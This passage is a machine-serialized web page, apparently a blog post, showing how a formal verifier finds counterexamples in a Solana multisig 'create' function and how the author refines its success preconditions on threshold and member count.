multisig",{"type":24,"tag":301,"props":29854,"children":29855},{"style":385},[29856],{"type":30,"value":1679},{"type":24,"tag":301,"props":29858,"children":29859},{"style":10246},[29860],{"type":30,"value":29861}," Account",{"type":24,"tag":301,"props":29863,"children":29864},{"style":359},[29865],{"type":30,"value":29690},{"type":24,"tag":301,"props":29867,"children":29868},{"style":10246},[29869],{"type":30,"value":29695},{"type":24,"tag":301,"props":29871,"children":29872},{"style":359},[29873],{"type":30,"value":377},{"type":24,"tag":301,"props":29875,"children":29876},{"style":10246},[29877],{"type":30,"value":29509},{"type":24,"tag":301,"props":29879,"children":29880},{"style":359},[29881],{"type":30,"value":12957},{"type":24,"tag":301,"props":29883,"children":29884},{"class":303,"line":504},[29885],{"type":24,"tag":301,"props":29886,"children":29887},{"emptyLinePlaceholder":16},[29888],{"type":30,"value":341},{"type":24,"tag":301,"props":29890,"children":29891},{"class":303,"line":512},[29892,29897,29901],{"type":24,"tag":301,"props":29893,"children":29894},{"style":359},[29895],{"type":30,"value":29896}," #[account(",{"type":24,"tag":301,"props":29898,"children":29899},{"style":348},[29900],{"type":30,"value":10550},{"type":24,"tag":301,"props":29902,"children":29903},{"style":359},[29904],{"type":30,"value":27029},{"type":24,"tag":301,"props":29906,"children":29907},{"class":303,"line":592},[29908,29912,29917,29921,29926,29930,29934],{"type":24,"tag":301,"props":29909,"children":29910},{"style":348},[29911],{"type":30,"value":27612},{"type":24,"tag":301,"props":29913,"children":29914},{"style":369},[29915],{"type":30,"value":29916}," creator",{"type":24,"tag":301,"props":29918,"children":29919},{"style":385},[29920],{"type":30,"value":1679},{"type":24,"tag":301,"props":29922,"children":29923},{"style":10246},[29924],{"type":30,"value":29925}," Signer",{"type":24,"tag":301,"props":29927,"children":29928},{"style":359},[29929],{"type":30,"value":29690},{"type":24,"tag":301,"props":29931,"children":29932},{"style":10246},[29933],{"type":30,"value":29695},{"type":24,"tag":301,"props":29935,"children":29936},{"style":359},[29937],{"type":30,"value":12957},{"type":24,"tag":301,"props":29939,"children":29940},{"class":303,"line":619},[29941,29945,29950,29954,29959,29963,29967,29971,29976],{"type":24,"tag":301,"props":29942,"children":29943},{"style":348},[29944],{"type":30,"value":27612},{"type":24,"tag":301,"props":29946,"children":29947},{"style":369},[29948],{"type":30,"value":29949}," system_program",{"type":24,"tag":301,"props":29951,"children":29952},{"style":385},[29953],{"type":30,"value":1679},{"type":24,"tag":301,"props":29955,"children":29956},{"style":10246},[29957],{"type":30,"value":29958}," Program",{"type":24,"tag":301,"props":29960,"children":29961},{"style":359},[29962],{"type":30,"value":29690},{"type":24,"tag":301,"props":29964,"children":29965},{"style":10246},[29966],{"type":30,"value":29695},{"type":24,"tag":301,"props":29968,"children":29969},{"style":359},[29970],{"type":30,"value":377},{"type":24,"tag":301,"props":29972,"children":29973},{"style":10246},[29974],{"type":30,"value":29975},"System",{"type":24,"tag":301,"props":29977,"children":29978},{"style":359},[29979],{"type":30,"value":12957},{"type":24,"tag":301,"props":29981,"children":29982},{"class":303,"line":635},[29983],{"type":24,"tag":301,"props":29984,"children":29985},{"style":359},[29986],{"type":30,"value":698},{"type":24,"tag":301,"props":29988,"children":29989},{"class":303,"line":643},[29990],{"type":24,"tag":301,"props":29991,"children":29992},{"emptyLinePlaceholder":16},[29993],{"type":30,"value":341},{"type":24,"tag":301,"props":29995,"children":29996},{"class":303,"line":652},[29997,30001,30005,30009],{"type":24,"tag":301,"props":29998,"children":29999},{"style":348},[30000],{"type":30,"value":20484},{"type":24,"tag":301,"props":30002,"children":30003},{"style":348},[30004],{"type":30,"value":20489},{"type":24,"tag":301,"props":30006,"children":30007},{"style":314},[30008],{"type":30,"value":13930},{"type":24,"tag":301,"props":30010,"children":30011},{"style":359},[30012],{"type":30,"value":1707},{"type":24,"tag":301,"props":30014,"children":30015},{"class":303,"line":666},[30016,30020,30024,30028,30032,30037],{"type":24,"tag":301,"props":30017,"children":30018},{"style":369},[30019],{"type":30,"value":26994},{"type":24,"tag":301,"props":30021,"children":30022},{"style":385},[30023],{"type":30,"value":1679},{"type":24,"tag":301,"props":30025,"children":30026},{"style":10246},[30027],{"type":30,"value":27060},{"type":24,"tag":301,"props":30029,"children":30030},{"style":359},[30031],{"type":30,"value":1849},{"type":24,"tag":301,"props":30033,"children":30034},{"style":10246},[30035],{"type":30,"value":30036},"Create",{"type":24,"tag":301,"props":30038,"children":30039},{"style":359},[30040],{"type":30,"value":12957},{"type":24,"tag":301,"props":30042,"children":30043},{"class":303,"line":674},[30044,30049,30053,30057],{"type":24,"tag":301,"props":30045,"children":30046},{"style":369},[30047],{"type":30,"value":30048}," threshold",{"type":24,"tag":301,"props":30050,"children":30051},{"style":385},[30052],{"type":30,"value":1679},{"type":24,"tag":301,"props":30054,"children":30055},{"style":10246},[30056],{"type":30,"value":27799},{"type":24,"tag":301,"props":30058,"children":30059},{"style":359},[30060],{"type":30,"value":1729},{"type":24,"tag":301,"props":30062,"children":30063},{"class":303,"line":692},[30064,30069,30073,30077],{"type":24,"tag":301,"props":30065,"children":30066},{"style":369},[30067],{"type":30,"value":30068}," create_key",{"type":24,"tag":301,"props":30070,"children":30071},{"style":385},[30072],{"type":30,"value":1679},{"type":24,"tag":301,"props":30074,"children":30075},{"style":10246},[30076],{"type":30,"value":27626},{"type":24,"tag":301,"props":30078,"children":30079},{"style":359},[30080],{"type":30,"value":1729},{"type":24,"tag":301,"props":30082,"children":30083},{"class":303,"line":3631},[30084,30089,30093,30097,30101,30105],{"type":24,"tag":301,"props":30085,"children":30086},{"style":369},[30087],{"type":30,"value":30088}," members",{"type":24,"tag":301,"props":30090,"children":30091},{"style":385},[30092],{"type":30,"value":1679},{"type":24,"tag":301,"props":30094,"children":30095},{"style":10246},[30096],{"type":30,"value":28158},{"type":24,"tag":301,"props":30098,"children":30099},{"style":359},[30100],{"type":30,"value":1849},{"type":24,"tag":301,"props":30102,"children":30103},{"style":10246},[30104],{"type":30,"value":28167},{"type":24,"tag":301,"props":30106,"children":30107},{"style":359},[30108],{"type":30,"value":12957},{"type":24,"tag":301,"props":30110,"children":30111},{"class":303,"line":3639},[30112,30116,30120,30124],{"type":24,"tag":301,"props":30113,"children":30114},{"style":359},[30115],{"type":30,"value":911},{"type":24,"tag":301,"props":30117,"children":30118},{"style":385},[30119],{"type":30,"value":882},{"type":24,"tag":301,"props":30121,"children":30122},{"style":10246},[30123],{"type":30,"value":20555},{"type":24,"tag":301,"props":30125,"children":30126},{"style":359},[30127],{"type":30,"value":27102},{"type":24,"tag":301,"props":30129,"children":30130},{"class":303,"line":3647},[30131],{"type":24,"tag":301,"props":30132,"children":30133},{"style":1062},[30134],{"type":30,"value":30135}," // sort the members and remove duplicates\n",{"type":24,"tag":301,"props":30137,"children":30138},{"class":303,"line":3685},[30139,30143,30147,30152,30156,30160],{"type":24,"tag":301,"props":30140,"children":30141},{"style":348},[30142],{"type":30,"value":9838},{"type":24,"tag":301,"props":30144,"children":30145},{"style":348},[30146],{"type":30,"value":9843},{"type":24,"tag":301,"props":30148,"children":30149},{"style":369},[30150],{"type":30,"value":30151}," members",{"type":24,"tag":301,"props":30153,"children":30154},{"style":385},[30155],{"type":30,"value":2537},{"type":24,"tag":301,"props":30157,"children":30158},{"style":369},[30159],{"type":30,"value":30151},{"type":24,"tag":301,"props":30161,"children":30162},{"style":359},[30163],{"type":30,"value":492},{"type":24,"tag":301,"props":30165,"children":30166},{"class":303,"line":3713},[30167,30171,30175,30180],{"type":24,"tag":301,"props":30168,"children":30169},{"style":369},[30170],{"type":30,"value":30088},{"type":24,"tag":301,"props":30172,"children":30173},{"style":385},[30174],{"type":30,"value":206},{"type":24,"tag":301,"props":30176,"children":30177},{"style":314},[30178],{"type":30,"value":30179},"sort",{"type":24,"tag":301,"props":30181,"children":30182},{"style":359},[30183],{"type":30,"value":4859},{"type":24,"tag":301,"props":30185,"children":30186},{"class":303,"line":3721},[30187,30191,30195,30200],{"type":24,"tag":301,"props":30188,"children":30189},{"style":369},[30190],{"type":30,"value":30088},{"type":24,"tag":301,"props":30192,"children":30193},{"style":385},[30194],{"type":30,"value":206},{"type":24,"tag":301,"props":30196,"children":30197},{"style":314},[30198],{"type":30,"value":30199},"dedup",{"type":24,"tag":301,"props":30201,"children":30202},{"style":359},[30203],{"type":30,"value":4859},{"type":24,"tag":301,"props":30205,"children":30206},{"class":303,"line":3751},[30207],{"type":24,"tag":301,"props":30208,"children":30209},{"emptyLinePlaceholder":16},[30210],{"type":30,"value":341},{"type":24,"tag":301,"props":30212,"children":30213},{"class":303,"line":3782},[30214],{"type":24,"tag":301,"props":30215,"children":30216},{"style":1062},[30217],{"type":30,"value":30218}," // check we don't exceed u16\n",{"type":24,"tag":301,"props":30220,"children":30221},{"class":303,"line":3791},[30222,30226,30231,30235,30239,30243,30247],{"type":24,"tag":301,"props":30223,"children":30224},{"style":348},[30225],{"type":30,"value":9838},{"type":24,"tag":301,"props":30227,"children":30228},{"style":369},[30229],{"type":30,"value":30230}," total_members",{"type":24,"tag":301,"props":30232,"children":30233},{"style":385},[30234],{"type":30,"value":2537},{"type":24,"tag":301,"props":30236,"children":30237},{"style":369},[30238],{"type":30,"value":30151},{"type":24,"tag":301,"props":30240,"children":30241},{"style":385},[30242],{"type":30,"value":206},{"type":24,"tag":301,"props":30244,"children":30245},{"style":314},[30246],{"type":30,"value":6156},{"type":24,"tag":301,"props":30248,"children":30249},{"style":359},[30250],{"type":30,"value":4859},{"type":24,"tag":301,"props":30252,"children":30253},{"class":303,"line":3819},[30254,30258,30262,30266,30270],{"type":24,"tag":301,"props":30255,"children":30256},{"style":308},[30257],{"type":30,"value":453},{"type":24,"tag":301,"props":30259,"children":30260},{"style":369},[30261],{"type":30,"value":30230},{"type":24,"tag":301,"props":30263,"children":30264},{"style":385},[30265],{"type":30,"value":3950},{"type":24,"tag":301,"props":30267,"children":30268},{"style":466},[30269],{"type":30,"value":487},{"type":24,"tag":301,"props":30271,"children":30272},{"style":359},[30273],{"type":30,"value":3035},{"type":24,"tag":301,"props":30275,"children":30276},{"class":303,"line":4397},[30277,30281,30286,30290,30295,30299,30304],{"type":24,"tag":301,"props":30278,"children":30279},{"style":308},[30280],{"type":30,"value":482},{"type":24,"tag":301,"props":30282,"children":30283},{"style":314},[30284],{"type":30,"value":30285}," err!",{"type":24,"tag":301,"props":30287,"children":30288},{"style":359},[30289],{"type":30,"value":362},{"type":24,"tag":301,"props":30291,"children":30292},{"style":10246},[30293],{"type":30,"value":30294},"MsError",{"type":24,"tag":301,"props":30296,"children":30297},{"style":385},[30298],{"type":30,"value":10308},{"type":24,"tag":301,"props":30300,"children":30301},{"style":10246},[30302],{"type":30,"value":30303},"EmptyMembers",{"type":24,"tag":301,"props":30305,"children":30306},{"style":359},[30307],{"type":30,"value":589},{"type":24,"tag":301,"props":30309,"children":30310},{"class":303,"line":4405},[30311],{"type":24,"tag":301,"props":30312,"children":30313},{"style":359},[30314],{"type":30,"value":501},{"type":24,"tag":301,"props":30316,"children":30317},{"class":303,"line":4422},[30318],{"type":24,"tag":301,"props":30319,"children":30320},{"emptyLinePlaceholder":16},[30321],{"type":30,"value":341},{"type":24,"tag":301,"props":30323,"children":30324},{"class":303,"line":4438},[30325],{"type":24,"tag":301,"props":30326,"children":30327},{"style":1062},[30328],{"type":30,"value":30329}," // make sure we don't exceed u16 on first call\n",{"type":24,"tag":301,"props":30331,"children":30332},{"class":303,"line":4446},[30333,30337,30341,30345,30349,30353,30357,30362,30366],{"type":24,"tag":301,"props":30334,"children":30335},{"style":308},[30336],{"type":30,"value":453},{"type":24,"tag":301,"props":30338,"children":30339},{"style":369},[30340],{"type":30,"value":30230},{"type":24,"tag":301,"props":30342,"children":30343},{"style":385},[30344],{"type":30,"value":20986},{"type":24,"tag":301,"props":30346,"children":30347},{"style":10246},[30348],{"type":30,"value":20525},{"type":24,"tag":301,"props":30350,"children":30351},{"style":385},[30352],{"type":30,"value":10308},{"type":24,"tag":301,"props":30354,"children":30355},{"style":314},[30356],{"type":30,"value":26245},{"type":24,"tag":301,"props":30358,"children":30359},{"style":359},[30360],{"type":30,"value":30361},"(u16",{"type":24,"tag":301,"props":30363,"children":30364},{"style":385},[30365],{"type":30,"value":10308},{"type":24,"tag":301,"props":30367,"children":30368},{"style":359},[30369],{"type":30,"value":30370},"MAX) {\n",{"type":24,"tag":301,"props":30372,"children":30373},{"class":303,"line":4506},[30374,30378,30382,30386,30390,30394,30399],{"type":24,"tag":301,"props":30375,"children":30376},{"style":308},[30377],{"type":30,"value":482},{"type":24,"tag":301,"props":30379,"children":30380},{"style":314},[30381],{"type":30,"value":30285},{"type":24,"tag":301,"props":30383,"children":30384},{"style":359},[30385],{"type":30,"value":362},{"type":24,"tag":301,"props":30387,"children":30388},{"style":10246},[30389],{"type":30,"value":30294},{"type":24,"tag":301,"props":30391,"children":30392},{"style":385},[30393],{"type":30,"value":10308},{"type":24,"tag":301,"props":30395,"children":30396},{"style":10246},[30397],{"type":30,"value":30398},"MaxMembersReached",{"type":24,"tag":301,"props":30400,"children":30401},{"style":359},[30402],{"type":30,"value":589},{"type":24,"tag":301,"props":30404,"children":30405},{"class":303,"line":4566},[30406],{"type":24,"tag":301,"props":30407,"children":30408},{"style":359},[30409],{"type":30,"value":501},{"type":24,"tag":301,"props":30411,"children":30412},{"class":303,"line":4574},[30413],{"type":24,"tag":301,"props":30414,"children":30415},{"emptyLinePlaceholder":16},[30416],{"type":30,"value":341},{"type":24,"tag":301,"props":30418,"children":30419},{"class":303,"line":4590},[30420],{"type":24,"tag":301,"props":30421,"children":30422},{"style":1062},[30423],{"type":30,"value":30424}," // make sure threshold is valid\n",{"type":24,"tag":301,"props":30426,"children":30427},{"class":303,"line":4599},[30428,30432,30436,30440,30444,30448,30452,30457,30461,30465,30469,30473,30477,30481,30485,30490,30495],{"type":24,"tag":301,"props":30429,"children":30430},{"style":308},[30431],{"type":30,"value":453},{"type":24,"tag":301,"props":30433,"children":30434},{"style":10246},[30435],{"type":30,"value":20525},{"type":24,"tag":301,"props":30437,"children":30438},{"style":385},[30439],{"type":30,"value":10308},{"type":24,"tag":301,"props":30441,"children":30442},{"style":314},[30443],{"type":30,"value":26245},{"type":24,"tag":301,"props":30445,"children":30446},{"style":359},[30447],{"type":30,"value":362},{"type":24,"tag":301,"props":30449,"children":30450},{"style":369},[30451],{"type":30,"value":29517},{"type":24,"tag":301,"props":30453,"children":30454},{"style":359},[30455],{"type":30,"value":30456},") \u003C ",{"type":24,"tag":301,"props":30458,"children":30459},{"style":466},[30460],{"type":30,"value":546},{"type":24,"tag":301,"props":30462,"children":30463},{"style":385},[30464],{"type":30,"value":3308},{"type":24,"tag":301,"props":30466,"children":30467},{"style":10246},[30468],{"type":30,"value":20525},{"type":24,"tag":301,"props":30470,"children":30471},{"style":385},[30472],{"type":30,"value":10308},{"type":24,"tag":301,"props":30474,"children":30475},{"style":314},[30476],{"type":30,"value":26245},{"type":24,"tag":301,"props":30478,"children":30479},{"style":359},[30480],{"type":30,"value":362},{"type":24,"tag":301,"props":30482,"children":30483},{"style":369},[30484],{"type":30,"value":29517},{"type":24,"tag":301,"props":30486,"children":30487},{"style":359},[30488],{"type":30,"value":30489},") > ",{"type":24,"tag":301,"props":30491,"children":30492},{"style":369},[30493],{"type":30,"value":30494},"total_members",{"type":24,"tag":301,"props":30496,"children":30497},{"style":359},[30498],{"type":30,"value":3035},{"type":24,"tag":301,"props":30500,"children":30501},{"class":303,"line":4629},[30502,30506,30510,30514,30518,30522,30527],{"type":24,"tag":301,"props":30503,"children":30504},{"style":308},[30505],{"type":30,"value":482},{"type":24,"tag":301,"props":30507,"children":30508},{"style":314},[30509],{"type":30,"value":30285},{"type":24,"tag":301,"props":30511,"children":30512},{"style":359},[30513],{"type":30,"value":362},{"type":24,"tag":301,"props":30515,"children":30516},{"style":10246},[30517],{"type":30,"value":30294},{"type":24,"tag":301,"props":30519,"children":30520},{"style":385},[30521],{"type":30,"value":10308},{"type":24,"tag":301,"props":30523,"children":30524},{"style":10246},[30525],{"type":30,"value":30526},"InvalidThreshold",{"type":24,"tag":301,"props":30528,"children":30529},{"style":359},[30530],{"type":30,"value":589},{"type":24,"tag":301,"props":30532,"children":30533},{"class":303,"line":4659},[30534],{"type":24,"tag":301,"props":30535,"children":30536},{"style":359},[30537],{"type":30,"value":501},{"type":24,"tag":301,"props":30539,"children":30540},{"class":303,"line":4668},[30541],{"type":24,"tag":301,"props":30542,"children":30543},{"emptyLinePlaceholder":16},[30544],{"type":30,"value":341},{"type":24,"tag":301,"props":30546,"children":30547},{"class":303,"line":4677},[30548,30552,30556,30560,30564,30569,30573,30577],{"type":24,"tag":301,"props":30549,"children":30550},{"style":369},[30551],{"type":30,"value":26994},{"type":24,"tag":301,"props":30553,"children":30554},{"style":385},[30555],{"type":30,"value":206},{"type":24,"tag":301,"props":30557,"children":30558},{"style":359},[30559],{"type":30,"value":21467},{"type":24,"tag":301,"props":30561,"children":30562},{"style":385},[30563],{"type":30,"value":206},{"type":24,"tag":301,"props":30565,"children":30566},{"style":359},[30567],{"type":30,"value":30568},"multisig",{"type":24,"tag":301,"props":30570,"children":30571},{"style":385},[30572],{"type":30,"value":206},{"type":24,"tag":301,"props":30574,"children":30575},{"style":314},[30576],{"type":30,"value":9033},{"type":24,"tag":301,"props":30578,"children":30579},{"style":359},[30580],{"type":30,"value":1707},{"type":24,"tag":301,"props":30582,"children":30583},{"class":303,"line":4697},[30584,30589],{"type":24,"tag":301,"props":30585,"children":30586},{"style":369},[30587],{"type":30,"value":30588}," threshold",{"type":24,"tag":301,"props":30590,"children":30591},{"style":359},[30592],{"type":30,"value":1729},{"type":24,"tag":301,"props":30594,"children":30595},{"class":303,"line":4725},[30596,30601],{"type":24,"tag":301,"props":30597,"children":30598},{"style":369},[30599],{"type":30,"value":30600}," create_key",{"type":24,"tag":301,"props":30602,"children":30603},{"style":359},[30604],{"type":30,"value":1729},{"type":24,"tag":301,"props":30606,"children":30607},{"class":303,"line":4733},[30608,30613],{"type":24,"tag":301,"props":30609,"children":30610},{"style":369},[30611],{"type":30,"value":30612}," members",{"type":24,"tag":301,"props":30614,"children":30615},{"style":359},[30616],{"type":30,"value":1729},{"type":24,"tag":301,"props":30618,"children":30619},{"class":303,"line":4741},[30620,30624,30628,30632,30637,30641,30645,30649,30654,30658,30662,30666],{"type":24,"tag":301,"props":30621,"children":30622},{"style":385},[30623],{"type":30,"value":14567},{"type":24,"tag":301,"props":30625,"children":30626},{"style":369},[30627],{"type":30,"value":27051},{"type":24,"tag":301,"props":30629,"children":30630},{"style":385},[30631],{"type":30,"value":206},{"type":24,"tag":301,"props":30633,"children":30634},{"style":359},[30635],{"type":30,"value":30636},"bumps",{"type":24,"tag":301,"props":30638,"children":30639},{"style":385},[30640],{"type":30,"value":206},{"type":24,"tag":301,"props":30642,"children":30643},{"style":314},[30644],{"type":30,"value":23138},{"type":24,"tag":301,"props":30646,"children":30647},{"style":359},[30648],{"type":30,"value":362},{"type":24,"tag":301,"props":30650,"children":30651},{"style":329},[30652],{"type":30,"value":30653},"\"multisig\"",{"type":24,"tag":301,"props":30655,"children":30656},{"style":359},[30657],{"type":30,"value":9961},{"type":24,"tag":301,"props":30659,"children":30660},{"style":385},[30661],{"type":30,"value":206},{"type":24,"tag":301,"props":30663,"children":30664},{"style":314},[30665],{"type":30,"value":10492},{"type":24,"tag":301,"props":30667,"children":30668},{"style":359},[30669],{"type":30,"value":10318},{"type":24,"tag":301,"props":30671,"children":30672},{"class":303,"line":4757},[30673],{"type":24,"tag":301,"props":30674,"children":30675},{"style":359},[30676],{"type":30,"value":30677}," )\n",{"type":24,"tag":301,"props":30679,"children":30680},{"class":303,"line":4765},[30681],{"type":24,"tag":301,"props":30682,"children":30683},{"style":359},[30684],{"type":30,"value":698},{"type":24,"tag":32,"props":30686,"children":30687},{},[30688,30690,30695,30697,30702],{"type":30,"value":30689},"We can start by testing an empty ",{"type":24,"tag":145,"props":30691,"children":30693},{"className":30692},[],[30694],{"type":30,"value":26925},{"type":30,"value":30696}," (this will default to ",{"type":24,"tag":145,"props":30698,"children":30700},{"className":30699},[],[30701],{"type":30,"value":10819},{"type":30,"value":7665},{"type":24,"tag":291,"props":30704,"children":30706},{"code":30705,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if()]\npub fn create(...) { ... }\n",[30707],{"type":24,"tag":145,"props":30708,"children":30709},{"__ignoreMap":7},[30710,30718],{"type":24,"tag":301,"props":30711,"children":30712},{"class":303,"line":304},[30713],{"type":24,"tag":301,"props":30714,"children":30715},{"style":359},[30716],{"type":30,"value":30717},"#[succeeds_if()]\n",{"type":24,"tag":301,"props":30719,"children":30720},{"class":303,"line":320},[30721,30725,30729,30733,30737,30741,30746,30750],{"type":24,"tag":301,"props":30722,"children":30723},{"style":348},[30724],{"type":30,"value":20484},{"type":24,"tag":301,"props":30726,"children":30727},{"style":348},[30728],{"type":30,"value":20489},{"type":24,"tag":301,"props":30730,"children":30731},{"style":314},[30732],{"type":30,"value":13930},{"type":24,"tag":301,"props":30734,"children":30735},{"style":359},[30736],{"type":30,"value":362},{"type":24,"tag":301,"props":30738,"children":30739},{"style":385},[30740],{"type":30,"value":4054},{"type":24,"tag":301,"props":30742,"children":30743},{"style":359},[30744],{"type":30,"value":30745},") { ",{"type":24,"tag":301,"props":30747,"children":30748},{"style":385},[30749],{"type":30,"value":4054},{"type":24,"tag":301,"props":30751,"children":30752},{"style":359},[30753],{"type":30,"value":16401},{"type":24,"tag":32,"props":30755,"children":30756},{},[30757],{"type":30,"value":30758},"Running the solver, we get:",{"type":24,"tag":291,"props":30760,"children":30762},{"code":30761},"...\nVERIFICATION:- FAILED\nVerification Time: 6.404167s\n",[30763],{"type":24,"tag":145,"props":30764,"children":30765},{"__ignoreMap":7},[30766],{"type":30,"value":30761},{"type":24,"tag":32,"props":30768,"children":30769},{},[30770,30771,30776],{"type":30,"value":2338},{"type":24,"tag":145,"props":30772,"children":30774},{"className":30773},[],[30775],{"type":30,"value":10819},{"type":30,"value":30777}," does not imply that the function will succeed (which is expected looking at the implementation above).",{"type":24,"tag":32,"props":30779,"children":30780},{},[30781],{"type":30,"value":30782},"We can ask the solver to produce a counterexample:",{"type":24,"tag":291,"props":30784,"children":30786},{"code":30785},"threshold: 33764\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[30787],{"type":24,"tag":145,"props":30788,"children":30789},{"__ignoreMap":7},[30790],{"type":30,"value":30785},{"type":24,"tag":32,"props":30792,"children":30793},{},[30794],{"type":30,"value":30795},"In this case, we can see that the threshold is invalid; it should not be larger than the number of members.",{"type":24,"tag":32,"props":30797,"children":30798},{},[30799],{"type":24,"tag":5422,"props":30800,"children":30801},{},[30802,30804,30810],{"type":30,"value":30803},"Note also that the verifier decided to use a ",{"type":24,"tag":145,"props":30805,"children":30807},{"className":30806},[],[30808],{"type":30,"value":30809},"SparseVec",{"type":30,"value":30811}," which is one of our custom vec implementations. In this case, the code we are verifying doesn't actually read or write to the vector and so we can model it simply as a symbolic size (with no data).",{"type":24,"tag":32,"props":30813,"children":30814},{},[30815],{"type":24,"tag":5422,"props":30816,"children":30817},{},[30818,30820,30825,30826,30832,30834,30839,30841,30846],{"type":30,"value":30819},"Using a sparse vec rather than a concrete vec is generally preferred as it speeds up computation and allows us to model arbitrarily sized vecs. ",{"type":24,"tag":145,"props":30821,"children":30823},{"className":30822},[],[30824],{"type":30,"value":4299},{"type":30,"value":2378},{"type":24,"tag":145,"props":30827,"children":30829},{"className":30828},[],[30830],{"type":30,"value":30831},"pop",{"type":30,"value":30833}," are stubbed out to simply panic for the ",{"type":24,"tag":145,"props":30835,"children":30837},{"className":30836},[],[30838],{"type":30,"value":30809},{"type":30,"value":30840}," and if this code tried to do that we would fall back to the concrete ",{"type":24,"tag":145,"props":30842,"children":30844},{"className":30843},[],[30845],{"type":30,"value":23991},{"type":30,"value":30847}," type.",{"type":24,"tag":32,"props":30849,"children":30850},{},[30851],{"type":30,"value":30852},"We can add this to our constraint and try again:",{"type":24,"tag":291,"props":30854,"children":30856},{"code":30855,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n)]\npub fn create(...) { ... }\n",[30857],{"type":24,"tag":145,"props":30858,"children":30859},{"__ignoreMap":7},[30860,30868,30905,30912],{"type":24,"tag":301,"props":30861,"children":30862},{"class":303,"line":304},[30863],{"type":24,"tag":301,"props":30864,"children":30865},{"style":359},[30866],{"type":30,"value":30867},"#[succeeds_if(\n",{"type":24,"tag":301,"props":30869,"children":30870},{"class":303,"line":320},[30871,30876,30880,30884,30888,30892,30896,30900],{"type":24,"tag":301,"props":30872,"children":30873},{"style":359},[30874],{"type":30,"value":30875}," (threshold ",{"type":24,"tag":301,"props":30877,"children":30878},{"style":348},[30879],{"type":30,"value":15654},{"type":24,"tag":301,"props":30881,"children":30882},{"style":10246},[30883],{"type":30,"value":20525},{"type":24,"tag":301,"props":30885,"children":30886},{"style":359},[30887],{"type":30,"value":911},{"type":24,"tag":301,"props":30889,"children":30890},{"style":385},[30891],{"type":30,"value":26188},{"type":24,"tag":301,"props":30893,"children":30894},{"style":359},[30895],{"type":30,"value":30151},{"type":24,"tag":301,"props":30897,"children":30898},{"style":385},[30899],{"type":30,"value":206},{"type":24,"tag":301,"props":30901,"children":30902},{"style":359},[30903],{"type":30,"value":30904},"len()\n",{"type":24,"tag":301,"props":30906,"children":30907},{"class":303,"line":335},[30908],{"type":24,"tag":301,"props":30909,"children":30910},{"style":359},[30911],{"type":30,"value":27029},{"type":24,"tag":301,"props":30913,"children":30914},{"class":303,"line":344},[30915,30919,30923,30927,30931,30935,30939,30943],{"type":24,"tag":301,"props":30916,"children":30917},{"style":348},[30918],{"type":30,"value":20484},{"type":24,"tag":301,"props":30920,"children":30921},{"style":348},[30922],{"type":30,"value":20489},{"type":24,"tag":301,"props":30924,"children":30925},{"style":314},[30926],{"type":30,"value":13930},{"type":24,"tag":301,"props":30928,"children":30929},{"style":359},[30930],{"type":30,"value":362},{"type":24,"tag":301,"props":30932,"children":30933},{"style":385},[30934],{"type":30,"value":4054},{"type":24,"tag":301,"props":30936,"children":30937},{"style":359},[30938],{"type":30,"value":30745},{"type":24,"tag":301,"props":30940,"children":30941},{"style":385},[30942],{"type":30,"value":4054},{"type":24,"tag":301,"props":30944,"children":30945},{"style":359},[30946],{"type":30,"value":16401},{"type":24,"tag":32,"props":30948,"children":30949},{},[30950],{"type":30,"value":30951},"Verification failed again! This time we get a different counterexample:",{"type":24,"tag":291,"props":30953,"children":30955},{"code":30954},"threshold: 0\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[30956],{"type":24,"tag":145,"props":30957,"children":30958},{"__ignoreMap":7},[30959],{"type":30,"value":30954},{"type":24,"tag":32,"props":30961,"children":30962},{},[30963],{"type":30,"value":30964},"Aha! The threshold cannot be 0 either... Let's try again:",{"type":24,"tag":291,"props":30966,"children":30968},{"code":30967,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n && threshold != 0\n)]\npub fn create(...) { ... }\n",[30969],{"type":24,"tag":145,"props":30970,"children":30971},{"__ignoreMap":7},[30972,30979,31014,31035,31042],{"type":24,"tag":301,"props":30973,"children":30974},{"class":303,"line":304},[30975],{"type":24,"tag":301,"props":30976,"children":30977},{"style":359},[30978],{"type":30,"value":30867},{"type":24,"tag":301,"props":30980,"children":30981},{"class":303,"line":320},[30982,30986,30990,30994,30998,31002,31006,31010],{"type":24,"tag":301,"props":30983,"children":30984},{"style":359},[30985],{"type":30,"value":30875},{"type":24,"tag":301,"props":30987,"children":30988},{"style":348},[30989],{"type":30,"value":15654},{"type":24,"tag":301,"props":30991,"children":30992},{"style":10246},[30993],{"type":30,"value":20525},{"type":24,"tag":301,"props":30995,"children":30996},{"style":359},[30997],{"type":30,"value":911},{"type":24,"tag":301,"props":30999,"children":31000},{"style":385},[31001],{"type":30,"value":26188},{"type":24,"tag":301,"props":31003,"children":31004},{"style":359},[31005],{"type":30,"value":30151},{"type":24,"tag":301,"props":31007,"children":31008},{"style":385},[31009],{"type":30,"value":206},{"type":24,"tag":301,"props":31011,"children":31012},{"style":359},[31013],{"type":30,"value":30904},{"type":24,"tag":301,"props":31015,"children":31016},{"class":303,"line":335},[31017,31021,31026,31030],{"type":24,"tag":301,"props":31018,"children":31019},{"style":385},[31020],{"type":30,"value":22410},{"type":24,"tag":301,"props":31022,"children":31023},{"style":359},[31024],{"type":30,"value":31025}," threshold ",{"type":24,"tag":301,"props":31027,"children":31028},{"style":385},[31029],{"type":30,"value":463},{"type":24,"tag":301,"props":31031,"children":31032},{"style":359},[31033],{"type":30,"value":31034}," 